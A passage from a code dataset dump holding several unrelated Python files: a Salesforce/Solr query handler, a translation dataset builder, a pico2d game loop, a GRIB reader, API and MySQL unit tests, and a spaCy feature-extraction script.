#\",config.hypen_delimiter))\n json_make[\"system\"]=remove_nan(datastr.get(\"System\",config.hypen_delimiter))\n json_make[\"date\"]=remove_nan(datastr.get(\"Date\",config.hypen_delimiter))\n json_make[\"aluminium_Al\"]=remove_nan(datastr.get(\"Aluminum (Al)\",config.hypen_delimiter))\n json_make[\"antimony_Sb\"]=remove_nan(datastr.get(\"Antimony (Sb)\",config.hypen_delimiter))\n json_make[\"arsenic_As\"]=remove_nan(datastr.get(\"Arsenic (As)\",config.hypen_delimiter))\n json_make[\"barium_Ba\"]=remove_nan(datastr.get(\"Barium 
(Ba)\",config.hypen_delimiter))\n json_make[\"beryllium_Be\"]=remove_nan(datastr.get(\"Beryllium (Be)\",config.hypen_delimiter))\n json_make[\"boron_B\"]=remove_nan(datastr.get(\"Boron (B)\",config.hypen_delimiter))\n json_make[\"cadmium_Cd\"]=remove_nan(datastr.get(\"Cadmium (Cd)\",config.hypen_delimiter))\n json_make[\"calcium_Ca\"]=remove_nan(datastr.get(\"Calcium (Ca)\",config.hypen_delimiter))\n json_make[\"carbon\"]=remove_nan(datastr.get(\"Carbon\",config.hypen_delimiter))\n json_list.append(json_make)\n except Exception as e:\n pass \n # elif sub_category==\"Communication History\" and (\"case_Number\" not in req_body) and (\"selected_level\" in req_body):\n elif sub_category==\"Communication History\" and (\"case_Number\" not in req_body):\n logging.info(f'communication req body {req_body}')\n sfdc_query=helper.sfdc_template(all_details_json)\n params={\"fl\":config.sfdc_column_str}\n sfdc_values,sfdc_df=helper.get_data_from_core(config.solr_sfdc,sfdc_query,params) \n if len(sfdc_values)>0 and (\"CASENUMBER\" in list(sfdc_df.columns)):\n if len(sfdc_df.columns)!=len(config.sfdc_column):\n dummy=pd.DataFrame([],columns=config.sfdc_column)\n sfdc_df=pd.concat([sfdc_df,dummy])\n case_df=sfdc_df[config.sfdc_case_call]\n case_df.drop_duplicates(inplace=True)\n case_df=case_df.fillna(config.hypen_delimiter)\n case_df=case_df.replace({\"NULL\":\"-\"})\n for index, row in case_df.iterrows():\n json_make={}\n json_make[\"case_Number\"]=row[\"CASENUMBER\"]\n json_make[\"manufacturing_Plant\"]=row[\"MANUFACTURINGPLANT\"]\n json_make[\"customer_Name\"]=row[\"ACCOUNTNAME\"]\n json_make[\"key\"]=row[\"MATCHEDPRODUCTVALUE\"]\n json_make[\"product_Type\"]=row[\"MATCHEDPRODUCTCATEGORY\"]\n json_make[\"topic\"]=row[\"REASON\"]\n json_make[\"tier_2_Owner\"]=row[\"SOP_TIER_2_OWNER_EMAIL_FORMULA__C\"]\n json_make[\"bu\"]=row[\"BU\"]\n json_list.append(json_make) \n elif sub_category==\"Communication History\" and (\"case_Number\" in req_body):\n selected_case=req_body.get(\"case_Number\")\n sfdc_query=helper.sfdc_template(all_details_json)\n sfdc_query = f'(CASENUMBER:{selected_case}) && '+sfdc_query\n params={\"fl\":config.sfdc_email_call}\n sfdc_values,sfdc_df=helper.get_data_from_core(config.solr_sfdc,sfdc_query,params)\n for item in sfdc_values:\n json_make={}\n if item.get(\"CONTACTEMAIL\",config.hypen_delimiter)!=\"NULL\":\n json_make[\"contact_Email\"]=item.get(\"CONTACTEMAIL\",config.hypen_delimiter)\n else:\n json_make[\"contact_Email\"]=config.hypen_delimiter\n json_make[\"email_Content\"]=item.get(\"EMAILBODY\",config.hypen_delimiter)\n json_make[\"email_Subject\"]=item.get(\"EMAILSUBJECT\",\"\")\n attachment=str(item.get(\"EMAILATTACHMENT\",\"\"))\n attachment_split=attachment.split(\"|:|\")\n add_doc=[]\n for att in attachment_split:\n if att!=\"NULL\" and att!='' and att!=\"Not Found\":\n path=att.split(\"/\")\n filename=(att[1:])\n # filename=(att[1:]).replace(\"?\",\"%3F\")\n filename=helper.replace_char_in_url(filename)\n file=(config.blob_file_path)+filename+(config.sas_token)\n add_doc.append({\"name\":path[-1],\"url\":file})\n json_make[\"attached_Docs\"]=add_doc\n json_list.append(json_make)\n return json_list\n except Exception as e:\n return json_list\n \ndef remove_nan(value):\n try:\n if value.strip().lower()==\"nan\" or value.strip()==\"\":\n return config.hypen_delimiter\n else:\n return value\n except Exception as e:\n return 
value\n","sub_path":"postCustomerCommunication/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"140756274","text":"from ilmulti.dataset import MonolingualDataset, ParallelDataset, MultilingualDataset\nfrom ilmulti.dataset.torch import TensorParallelDataset\nfrom ilmulti.dataset import AgnosticTokenizedDataset\nfrom ilmulti.filters import PairDetect\nfrom ilmulti.sentencepiece import SentencePieceTokenizer\nfrom ilmulti.dataset.torch import TensorMultiDataset\nimport os\nfrom ilmulti.dataset import ParallelWriter\nfrom ilmulti.dataset import FakeParallelDataset\nfrom ilmulti.utils import canonicalize\nfrom tqdm import tqdm, trange\n\n# Create tokenizer\n\ntokenizer = SentencePieceTokenizer()\n# exit()\n\n# Declare datasets\nmininterval = 100\nfrom argparse import ArgumentParser\nparser = ArgumentParser()\nparser.add_argument('--lang', required=True, type=str)\nparser.add_argument('--output', required=True, type=str)\nargs = parser.parse_args()\n\nif not os.path.exists(args.output):\n os.makedirs(args.output)\n\ndictionary = tokenizer.dictionary()\ndictionary.save(os.path.join(args.output, \"vocab.dict\"))\n\n# def dfilter(sset, ext):\n# ls = []\n# for dataset in sset:\n# # if canonicalize(ext) in dataset.exts:\n# # print(dataset, canonicalize(ext) == dataset.exts[1])\n# if canonicalize(ext) == dataset.exts[1]:\n# ls.append(dataset)\n# return set(ls)\n# \n# \nclass Collector(set):\n def __init__(self, *args, **kwargs):\n super().__init__(self, *args, **kwargs)\n\n def add(self, pset):\n super().add(pset)\n if not pset.is_mono():\n pass\n first, second = pset.get_mono_as_parallel()\n super().add(first)\n super().add(second)\n\npairs = Collector()\n\ndef augmented(prefix, exts):\n src, tgt = exts\n return [\n ParallelDataset(prefix, (src, tgt)),\n ParallelDataset(prefix, (tgt, src)),\n ]\n# \n# root = '/Neutron5/jerin/consolidation/parallel/ilci/'\n# required = ['bg', 'en', 'hi', 'ml', 'ta', 'te', 'ud']\n# n = len(required)\n# for i in range(n):\n# for j in range(i+1, n):\n# exts = (required[i], required[j])\n# prefix = os.path.join(root, 'complete')\n# parallels = augmented(prefix, exts)\n# for parallel in parallels:\n# pairs.add(parallel)\n# \n# \n# # 2: OpenSubs: OPUS\n# root = '/Neutron5/jerin/consolidation/parallel/wat-2018-multi'\n# langs = ['bn', 'hi', 'ta', 'te', 'ml', 'ur']\n# for lang in langs:\n# _dir = 'multiway-{}-en'.format(lang)\n# prefix = os.path.join(root, _dir, 'train')\n# exts = ('en', lang)\n# parallels = augmented(prefix, exts)\n# for parallel in parallels:\n# pairs.add(parallel)\n# \n# # 3: National Dataset\n# root = '/Neutron5/jerin/consolidation/parallel/national'\n# prefix = os.path.join(root, 'national')\n# exts = ('en', 'hi')\n# # parallel = ParallelDataset(prefix, exts)\n# parallels = augmented(prefix, exts)\n# for parallel in parallels:\n# pairs.add(parallel)\n\n\n# 4: Monolingual Available\n## Malayalam \n# root = '/Neutron5/jerin/malayalam-data/'\n# prefix = os.path.join(root, 'all')\n# ext = 'ml'\n# parallel = FakeParallelDataset(prefix, ext)\n# pairs.add(parallel)\n\n# # 5: IIT-Bombay\n# root = '/Neutron5/jerin/consolidation/parallel/f-iitb/f-iitb'\n# _dir = ''.format(lang)\n# prefix = os.path.join(root, 'train')\n# exts = ('en', 'hi')\n# parallels = augmented(prefix, exts)\n# # parallel = ParallelDataset(prefix, exts)\n# for parallel in parallels:\n# pairs.add(parallel)\n\n# print(\"Filtering!\")\n# pairs = dfilter(pairs, 
args.lang)\n# for pair in pairs:\n# print(pair)\n# dataset = TensorMultiDataset(pairs, tokenizer)\n# writer = ParallelWriter(args.output, 'train', 'src', 'tgt')\n# for i in trange(len(dataset)):\n# src, src_tokens, src_lengths, tgt, tgt_tokens, tgt_lengths = dataset[i]\n# \n# src_lang_token, *src_tokens = src_tokens\n# tgt_lang_token, *tgt_tokens = tgt_tokens\n# src_tokens = [tgt_lang_token] + src_tokens\n# \n# f = lambda x: ' '.join(x)\n# source_sentence = f(src_tokens)\n# target_sentence = f(tgt_tokens)\n# writer.write(source_sentence, target_sentence)\n\n# Dev Dataset\n# -----------------------------------------------------\n# \n# pairs = Collector()\n# root = '/Neutron5/jerin/consolidation/parallel/wat-2018-multi'\n# langs = ['bn', 'hi', 'ta', 'te', 'ml', 'ur']\n# for lang in langs:\n# _dir = 'multiway-{}-en'.format(lang)\n# prefix = os.path.join(root, _dir, 'dev')\n# exts = ('en', lang)\n# parallels = augmented(prefix, exts)\n# # parallel = ParallelDataset(prefix, exts)\n# for parallel in parallels:\n# pairs.add(parallel)\n# \n# root = '/Neutron5/jerin/consolidation/parallel/f-iitb/f-iitb'\n# _dir = ''.format(lang)\n# prefix = os.path.join(root, 'dev')\n# exts = ('en', 'hi')\n# parallels = augmented(prefix, exts)\n# # parallel = ParallelDataset(prefix, exts)\n# for parallel in parallels:\n# pairs.add(parallel)\n# # \n# # # multi = AgnosticTokenizedDataset(pairs, tokenizer)\n# pairs = dfilter(pairs, args.lang)\n# dataset = TensorMultiDataset(pairs, tokenizer)\n# writer = ParallelWriter(args.output, 'dev', 'src', 'tgt')\n# for i in trange(len(dataset), mininterval=mininterval):\n# src, src_tokens, src_lengths, tgt, tgt_tokens, tgt_lengths = dataset[i]\n# \n# src_lang_token, *src_tokens = src_tokens\n# tgt_lang_token, *tgt_tokens = tgt_tokens\n# src_tokens = [tgt_lang_token] + src_tokens\n# \n# f = lambda x: ' '.join(x)\n# source_sentence = f(src_tokens)\n# target_sentence = f(tgt_tokens)\n# writer.write(source_sentence, target_sentence)\n\n# Test Dataset\n# -----------------------------------------------------\n\n# pairs = Collector()\n# root = '/Neutron5/jerin/consolidation/parallel/wat-2018-multi'\n# langs = ['bn', 'hi', 'ta', 'te', 'ml', 'ur']\n# \n# for lang in langs:\n# _dir = 'multiway-{}-en'.format(lang)\n# prefix = os.path.join(root, _dir, 'test')\n# exts = ('en', lang)\n# parallels = augmented(prefix, exts)\n# # parallel = ParallelDataset(prefix, exts)\n# for parallel in parallels:\n# pairs.add(parallel)\n\npairs = Collector()\nroot = '/Neutron5/jerin/consolidation/parallel/wat-normalized'\nlangs = ['bn', 'hi', 'ta', 'te', 'ml', 'ur']\n\nfor lang in langs:\n _dir = '{}-en'.format(lang)\n prefix = os.path.join(root, _dir, 'test')\n exts = ('en', lang)\n parallels = augmented(prefix, exts)\n # parallel = ParallelDataset(prefix, exts)\n for parallel in parallels:\n pairs.add(parallel)\n\n# root = '/Neutron5/jerin/consolidation/parallel/f-iitb/f-iitb'\n# # _dir = ''.format(lang)\n# prefix = os.path.join(root, 'test')\n# exts = ('en', 'hi')\n# parallels = augmented(prefix, exts)\n# # parallel = ParallelDataset(prefix, exts)\n# for parallel in parallels:\n# print(parallel)\n# pairs.add(parallel)\n\n# pairs = dfilter(pairs, args.lang)\ndataset = TensorMultiDataset(pairs, tokenizer)\nwriter = ParallelWriter(args.output, 'test', 'src', 'tgt')\nmapping_fname = os.path.join(args.output, \"test_lang.mapping\")\nmapping = open(mapping_fname, 'w+')\nfor i in trange(len(dataset), mininterval=mininterval):\n src, src_tokens, src_lengths, tgt, tgt_tokens, tgt_lengths = dataset[i]\n 
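# pop the language tag off each side, then prefix the source with the target-language tag so the written pair encodes the desired output language\n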
src_lang_token, *src_tokens = src_tokens\n tgt_lang_token, *tgt_tokens = tgt_tokens\n src_tokens = [tgt_lang_token] + src_tokens\n f = lambda x: ' '.join(x)\n source_sentence = f(src_tokens)\n target_sentence = f(tgt_tokens)\n writer.write(source_sentence, target_sentence)\n print(' '.join([str(i), src_lang_token, tgt_lang_token]), file=mapping)\n","sub_path":"ilmulti/test_scripts/torch_datasets.py","file_name":"torch_datasets.py","file_ext":"py","file_size_in_byte":7389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"599201150","text":"from pico2d import*\n\nKPU_WIDTH, KPU_HEIGHT = 1280, 1024\n\ndef handle_events():\n\tglobal running\n\tglobal x, y\n\tevents = get_events()\n\tfor event in events:\n\t\tif event.type == SDL_QUIT:\n\t\t\trunning = False\n\t\telif event.type == SDL_MOUSEMOTION:\n\t\t\tx, y = event.x, KPU_HEIGHT - 1 - event.y\n\t\telif event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:\n\t\t\trunning = False\n\nopen_canvas(KPU_WIDTH, KPU_HEIGHT)\nkpu_ground = load_image('grass.png')\ncharacter = load_image('run_animation.png')\n\nrunning = True\nx = 800 // 2\nframe = 0\ndir = 0\n\nwhile running:\n\tclear_canvas()\n\tkpu_ground.draw(400,30)\n\tcharacter.clip_draw(frame * 100, 0, 100, 100, x, 90)\n\tupdate_canvas()\n\thandle_events()\n\tframe = (frame + 1) % 8\n\tx += dir * 5\n\tdelay(0.01)\n\n","sub_path":"수업내용/3주차_2.py","file_name":"3주차_2.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"229133324","text":"from eccodes import *\n#INPUT= \"AROME_010_SP1_06H_201702040000.grib2\"\n#INPUT= \"AROME_0.025_SP1_00H06H_201510131800.grib2\"\nINPUT= \"AROME_0.025_SP2_19H24H_201510131800.grib2\"\n#INPUT= \"cosmo-d2_germany_rotated-lat-lon_single-level_2018080818_006_T_2M.grib2\"\nwith GribFile(INPUT) as grib:\n messages=[]\n for i in range(len(grib)): # range(0,1)\n msg = GribMessage(grib)\n messages.append(msg)\n print (\" ************* Number of messages in the Grib file : \",len(messages))\n print (messages[0].keys())\n n=1\n for msg in messages : \n print (n,msg[\"name\"],msg[\"level\"],msg[\"date\"],msg[\"hour\"],msg[\"forecastTime\"],msg[\"validityDate\"],msg[\"validityTime\"])\n n=n+1\n '''\n for k in msg.keys():\n print (k,\" : \",msg[k])\n '''","sub_path":".~c9_invoke_jkD4VC.py","file_name":".~c9_invoke_jkD4VC.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"452881463","text":"from __future__ import unicode_literals\n\nimport mock\n\nfrom tracpro.test import factories\nfrom tracpro.test.cases import TracProTest\n\nfrom ..
import models\nfrom ..tasks import sync_questions_categories\n\n\nclass TestPollTask(TracProTest):\n\n @mock.patch.object(models.Poll, 'get_flow_definition')\n @mock.patch('tracpro.polls.tasks.logger.info')\n def test_sync_questions_categories(self, mock_logger, mock_poll_get_flow):\n self.org = factories.Org()\n self.poll_1 = factories.Poll(org=self.org, name='Poll 1')\n self.poll_2 = factories.Poll(org=self.org, name='Poll 2')\n # Create 2 questions locally:\n # one that is on RapidPro\n # and one that should be removed because it won't be on RapidPro\n self.question_1 = factories.Question(\n poll=self.poll_1, ruleset_uuid='goodquestion', question_type=models.Question.TYPE_MULTIPLE_CHOICE)\n self.question_2 = factories.Question(\n poll=self.poll_1, ruleset_uuid='oldquestion', question_type=models.Question.TYPE_MULTIPLE_CHOICE)\n\n # Data to pass to form for testing. Only select one poll\n self.data = [self.poll_1]\n # Patch the call to the API\n flow_1 = mock.Mock()\n flow_1.uuid = 'abcdefg123'\n flow_1.name = self.poll_1.name\n ruleset_existing = mock.Mock()\n ruleset_existing.uuid = 'goodquestion'\n ruleset_existing.label = 'good question'\n ruleset_new = mock.Mock()\n ruleset_new.uuid = 'newquestion'\n ruleset_new.label = 'new question'\n flow_1.rulesets = [ruleset_existing, ruleset_new]\n\n # Mock the call to the API to send back a single flow matching our first poll\n self.mock_temba_client.get_flows.return_value = [flow_1]\n # Mock this call to return an empty rule set so that RapidPro API is not called\n mock_poll_get_flow.return_value.rulesets = []\n\n # Assert that the 2 questions exist before we sync when one should be deleted\n self.assertEqual(models.Question.objects.count(), 2)\n\n # Call the task to sync questions...\n sync_questions_categories(self.org, self.data)\n # Two questions exist locally, one is new from the RapidPro API mock (flow_1.rulesets)\n self.assertEqual(models.Question.objects.count(), 2)\n self.assertEqual(models.Question.objects.first().ruleset_uuid, 'goodquestion')\n self.assertEqual(models.Question.objects.last().ruleset_uuid, 'newquestion')\n # Only 1 poll was reflected in the log message as only 1 poll was sent into the form data\n self.assertEqual(mock_logger.call_count, 2)\n self.assertIn(\"1 Poll(s)\", mock_logger.call_args[0][0])\n","sub_path":"tracpro/polls/tests/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"535056541","text":"import taps\n\n\ndef read_word_file(file):\n \"\"\"\n Reads a file full of words (one word per line) and puts them into a list. 
Any lines that begin with a '#'\n character are ignored.\n\n :rtype: List of words read in from the file.\n \"\"\"\n words = []\n with open(file, 'r') as wordfile:\n w = wordfile.readlines()\n\n for word in w:\n word = word.strip()\n if not word.startswith(\"#\") and len(word) > 0:\n words.append(word.lower())\n\n return words\n\n\ndef sort_file(infile, outfile=None):\n \"\"\"\n Reads in a file line by line, and sorts the lines alphabetically.\n\n :param infile - the name of the file that has lines to be sorted.\n :param outfile - the name of the file to write the data to, if no file is provided writes to the same\n file name as infile.\n\n :return: None - but does write out the sorted file\n \"\"\"\n words = read_word_file(infile)\n words.sort()\n\n out = infile\n if outfile is not None:\n out = outfile\n\n with open(out, 'w') as writefile:\n for word in words:\n writefile.write(word)\n writefile.write(\"\\n\")\n\n# Basic Test Data\nsentence = 'Throw Dirty rock at that mangey old goblin'\nprint(\"testing input sentence:\", sentence)\n\n# Init the Game Dictionary\nadjectives = ['dirty', 'shiny']\ncommands = ['quit']\nnouns = ['goblin', 'rock']\nprepositions = ['above', 'at', 'with']\nverbs = ['throw', 'attack', 'look']\ngame_dictionary = taps.GameDictionary(adjectives, commands, nouns, prepositions, verbs)\n\n# Create Parser\nip = taps.InputParser(game_dictionary)\n\n# Parse Sentence.\nip.parse_input(sentence)","sub_path":"test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"171834193","text":"# Copyright 2014 - Savoir-Faire Linux inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport copy\nimport json\n\nfrom surveil.api.datamodel.config import service\nfrom surveil.tests.api import functionalTest\n\n\nclass TestServiceController(functionalTest.FunctionalTest):\n\n def setUp(self):\n super(TestServiceController, self).setUp()\n self.services = [\n {\n \"host_name\": \"sample-server1\",\n \"service_description\": \"check-\",\n \"check_command\": \"check-disk!/dev/sdb1\",\n \"max_check_attempts\": 5,\n \"check_interval\": 5,\n \"retry_interval\": 3,\n \"check_period\": \"24x7\",\n \"notification_interval\": 30,\n \"notification_period\": \"24x7\",\n \"contacts\": \"surveil-ptl,surveil-bob\",\n \"contact_groups\": \"linux-admins\"\n },\n {\n \"host_name\": \"sample-server2\",\n \"service_description\": \"check-disk-sdb\",\n \"check_command\": \"check-disk!/dev/sdb1\",\n \"max_check_attempts\": 5,\n \"check_interval\": 5,\n \"retry_interval\": 3,\n \"check_period\": \"24x7\",\n \"notification_interval\": 30,\n \"notification_period\": \"24x7\",\n \"contacts\": \"surveil-ptl,surveil-bob\",\n \"contact_groups\": \"linux-admins\"\n },\n {\n \"host_name\": \"sample-server3\",\n \"service_description\": \"check-disk-sdb\",\n \"check_command\": \"check-disk!/dev/sdb1\",\n \"max_check_attempts\": 5,\n \"check_interval\": 5,\n \"retry_interval\": 3,\n \"check_period\": \"24x7\",\n \"notification_interval\": 30,\n \"notification_period\": \"24x7\",\n \"contacts\": \"surveil-ptl,surveil-bob\",\n \"contact_groups\": \"linux-admins\"\n },\n ]\n self.mongoconnection.shinken.services.insert(\n copy.deepcopy(self.services)\n )\n\n def test_get_all_services(self):\n response = self.get('/v2/config/services')\n\n self.assert_count_equal_backport(\n json.loads(response.body.decode()),\n self.services\n )\n self.assertEqual(response.status_int, 200)\n\n def test_get_all_services_no_templates(self):\n self.mongoconnection.shinken.services.insert(\n copy.deepcopy(\n {\"host_name\": \"sample-server3\",\n \"service_description\": \"check-disk-sdb\",\n \"check_command\": \"check-disk!/dev/sdb1\",\n \"max_check_attempts\": 5,\n \"check_interval\": 5,\n \"retry_interval\": 3,\n \"check_period\": \"24x7\",\n \"notification_interval\": 30,\n \"notification_period\": \"24x7\",\n \"contacts\": \"surveil-ptl,surveil-bob\",\n \"register\": \"0\",\n \"contact_groups\": \"linux-admins\"}\n )\n )\n response = self.get('/v2/config/services')\n\n self.assert_count_equal_backport(\n json.loads(response.body.decode()),\n self.services\n )\n self.assertEqual(response.status_int, 200)\n\n def test_add_service(self):\n new_service = {\n \"host_name\": \"SOMEHOSTNAME\",\n \"service_description\": \"check-new-thing\",\n \"check_command\": \"check-disk!/dev/sdb1\",\n \"max_check_attempts\": 5,\n \"check_interval\": 5,\n \"retry_interval\": 3,\n \"check_period\": \"24x7\",\n \"notification_interval\": 30,\n \"notification_period\": \"24x7\",\n \"contacts\": \"surveil-ptl,surveil-bob\",\n \"contact_groups\": \"linux-admins\"\n }\n response = self.post_json(\n \"/v2/config/services\",\n params=new_service\n )\n\n services = [service.Service(**s).as_dict() for s in\n self.mongoconnection.shinken.services.find()]\n\n self.assertTrue(new_service in services)\n self.assertEqual(response.status_int, 
201)\n","sub_path":"surveil/tests/api/controllers/v2/config/test_services.py","file_name":"test_services.py","file_ext":"py","file_size_in_byte":4684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"101155509","text":"import pytest\nimport mysql_proc as mysql_proc\nimport datetime\n\n\n\n#------------------------------------------------------------------------------\n#-\n#- Test Tools\n#-\n#------------------------------------------------------------------------------\n\n\nclass TestBattleResult(mysql_proc.BattleResult):\n name = \"testname\"\n choice_id = 1\n result = \"win\"\n\n#------------------------------------------------------------------------------\n#-\n#- Test Function\n#-\n#------------------------------------------------------------------------------\n\ndef test_getEngineKey():\n\n get_key = mysql_proc.getEngineKey(\"testuser\",\"testpass\",\"testhost\",\"testdb\")\n assert \"mysql://testuser:testpass@testhost/testdb\" == get_key\n\ndef test_getEngineRps():\n get_engine = mysql_proc.getEngineRps()\n\n assert \"mysql\" == get_engine.name\n assert \"mysqldb\" == get_engine.driver\n assert True == get_engine.has_table(\"battle_history\")\n\n\ndef test_rps_engine():\n get_engine = mysql_proc.rps_engine\n\n assert \"mysql\" == get_engine.name\n assert \"mysqldb\" == get_engine.driver\n assert True == get_engine.has_table(\"battle_history\")\n\ndef test_getSession():\n engine = mysql_proc.rps_engine\n session = mysql_proc.getSession(engine)\n assert True == session.is_active\n \ndef test_ClassBattleResult():\n br = mysql_proc.BattleResult()\n nowdate = datetime.datetime.now()\n assert (nowdate - br.time_now ).total_seconds() <= 1\n\n assert br.name == \"NA\"\n assert br.choice_id == 0\n assert br.result == \"\"\n\n br.name = \"testname\"\n br.choice_id = 1\n br.result = \"testresult\"\n\n assert br.name == \"testname\"\n assert br.choice_id == 1\n assert br.result == \"testresult\"\n\ndef test_rpsInsert(\n all_delete_battle_history\n ):\n\n br=TestBattleResult()\n mysql_proc.rpsInsert(br)\n\n engine = mysql_proc.rps_engine\n session = mysql_proc.getSession(engine)\n query_result = session.query(mysql_proc.BattleHistory).all()\n session.close()\n\n nowdate = datetime.datetime.now()\n assert (nowdate - query_result[0].time ).total_seconds() <= 10\n assert query_result[0].name == \"testname\"\n assert query_result[0].choice_id == 1\n assert query_result[0].result == \"win\"\n\n@pytest.mark.parametrize(\n \"dictarg, expectresult1, expectresult2\", [\n ({\"None\":\"None\"}, 2,3),\n ({\"result\":\"win\"}, 2,2)\n])\ndef test_rpsCount(\n all_delete_battle_history,\n dictarg, expectresult1, expectresult2\n ):\n br=TestBattleResult()\n mysql_proc.rpsInsert(br)\n mysql_proc.rpsInsert(br)\n\n count_total = mysql_proc.rpsCount(**dictarg)\n assert count_total == expectresult1\n\n br.result = \"loose\"\n mysql_proc.rpsInsert(br)\n count_total = mysql_proc.rpsCount(**dictarg)\n assert count_total == expectresult2\n\n\n#- test for Proc function -------------------------------------------\n\ndef test_rpsGetBattleCountAll(\n all_delete_battle_history\n ):\n br=TestBattleResult()\n mysql_proc.rpsInsert(br)\n mysql_proc.rpsInsert(br)\n assert mysql_proc.rpsGetBattleCountAll() == 2\n\n mysql_proc.rpsInsert(br)\n assert mysql_proc.rpsGetBattleCountAll() == 3\n \ndef test_rpsGetBattleCountForResult(\n all_delete_battle_history\n ):\n br=TestBattleResult()\n mysql_proc.rpsInsert(br)\n mysql_proc.rpsInsert(br)\n br.result = \"loose\"\n 
mysql_proc.rpsInsert(br)\n assert mysql_proc.rpsGetBattleCountForResult(\"win\") == 2\n assert mysql_proc.rpsGetBattleCountForResult(\"loose\") == 1\n\ndef test_recordedBattleResult(\n all_delete_battle_history\n ):\n\n mysql_proc.recordedBattleResult(\"testname\",1,\"win\")\n\n engine = mysql_proc.rps_engine\n session = mysql_proc.getSession(engine)\n query_result = session.query(mysql_proc.BattleHistory).all()\n session.close()\n\n nowdate = datetime.datetime.now()\n assert (nowdate - query_result[0].time ).total_seconds() <= 10\n assert query_result[0].name == \"testname\"\n assert query_result[0].choice_id == 1\n assert query_result[0].result == \"win\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"docker/__001_01_flask_image_std/setup/test_mysql_proc.py","file_name":"test_mysql_proc.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"106899097","text":"from scipy.sparse import *\nimport pandas as pd\nimport spacy\nimport time\nimport os\nimport io\n\n\n# import NLP library\nnlp = spacy.load('en_core_web_lg')\n\n# set working path\nhome_dir = os.path.expanduser(\"~\")\nos.chdir(home_dir + '/OneDrive/Academy/the U/Assignment/AssignmentSln/ML-03-final-movie')\n\n# import given features ----\ndef import_given_feature():\n voc_n = 74481 # vocabulary size\n train_data = []\n with io.open('data/data-splits/data.train', encoding = 'utf8') as f:\n lines = f.readlines()\n for i, line in enumerate(lines):\n line = line.strip().split()\n label = int(line.pop(0))\n label = -1 if label == 0 else 1\n feature_dict = dict([(int(i.split(':')[0]), float(i.split(':')[1])) for i in line])\n # convert feature to sparse vector\n feature = lil_matrix((1, voc_n))\n for k, v in feature_dict.items():\n feature[0, k-1] = v\n feature = feature.tocsr()\n line = {'id': i, 'label': label, 'vector': feature}\n train_data.append(line)\n train_data = pd.DataFrame(train_data)\n # save \n train_data['label'].to_pickle('label_train.pkl')\n train_data.to_pickle('train_data.pkl')\n\n test_data = []\n with io.open('data/data-splits/data.test', encoding = 'utf8') as f:\n lines = f.readlines()\n for i, line in enumerate(lines):\n line = line.strip().split()\n label = int(line.pop(0))\n label = -1 if label == 0 else 1\n feature_dict = dict([(int(i.split(':')[0]), float(i.split(':')[1])) for i in line])\n # convert feature to sparse vector\n feature = lil_matrix((1, voc_n))\n for k, v in feature_dict.items():\n feature[0, k-1] = v\n feature = feature.tocsr()\n line = {'id': i, 'label': label, 'vector': feature}\n test_data.append(line)\n test_data = pd.DataFrame(test_data)\n # save \n test_data['label'].to_pickle('label_test.pkl')\n test_data.to_pickle('test_data.pkl')\n\n eval_data = []\n with io.open('data/data-splits/data.eval.anon', encoding = 'utf8') as f:\n lines = f.readlines()\n for i, line in enumerate(lines):\n line = line.strip().split()\n label = int(line.pop(0))\n label = -1 if label == 0 else 1\n feature_dict = dict([(int(i.split(':')[0]), float(i.split(':')[1])) for i in line])\n # convert feature to sparse vector\n feature = lil_matrix((1, voc_n))\n for k, v in feature_dict.items():\n feature[0, k-1] = v\n feature = feature.tocsr()\n line = {'id': i, 'label': label, 'vector': feature}\n eval_data.append(line)\n eval_data = pd.DataFrame(eval_data)\n with io.open('data/data-splits/data.eval.anon.id', encoding = 'utf8') as f:\n eval_data_id = [f.strip() for f in f.readlines()]\n eval_data['example_id'] = eval_data_id\n 
# save \n eval_data['example_id'].to_pickle('eval_id.pkl')\n eval_data.to_pickle('eval_data.pkl')\n\n\n# generate my feature ----\ndef make_my_feature():\n # training set ----\n start_time = time.time()\n with io.open('data/raw-data/train.rawtext', encoding = 'utf8') as f:\n train_data = {'id':[], 'text':[]}\n lines = f.readlines()\n for i, line in enumerate(lines):\n train_data['id'].append(i)\n train_data['text'].append(nlp(line))\n train_data = pd.DataFrame(train_data)\n print(\"--- %s minutes ---\" % ((time.time() - start_time) / 60))\n # add label\n label = pd.read_pickle('label_train.pkl')\n train_data['label'] = label\n # generate sentence embedding\n train_data['vector'] = train_data['text'].apply(lambda r: csr_matrix(r.vector))\n\n # save to external file\n train_data2_sm = train_data[['id', 'label', 'vector']]\n train_data2_sm.to_pickle('train_data2_sm.pkl')\n\n # test set ----\n start_time = time.time()\n with io.open('data/raw-data/test.rawtext', encoding = 'utf8') as f:\n test_data = {'id':[], 'text':[]}\n lines = f.readlines()\n for i, line in enumerate(lines):\n test_data['id'].append(i)\n test_data['text'].append(nlp(line))\n test_data = pd.DataFrame(test_data)\n print(\"--- %s minutes ---\" % ((time.time() - start_time) / 60))\n # add label\n label = pd.read_pickle('label_test.pkl')\n test_data['label'] = label\n # generate sentence embedding\n 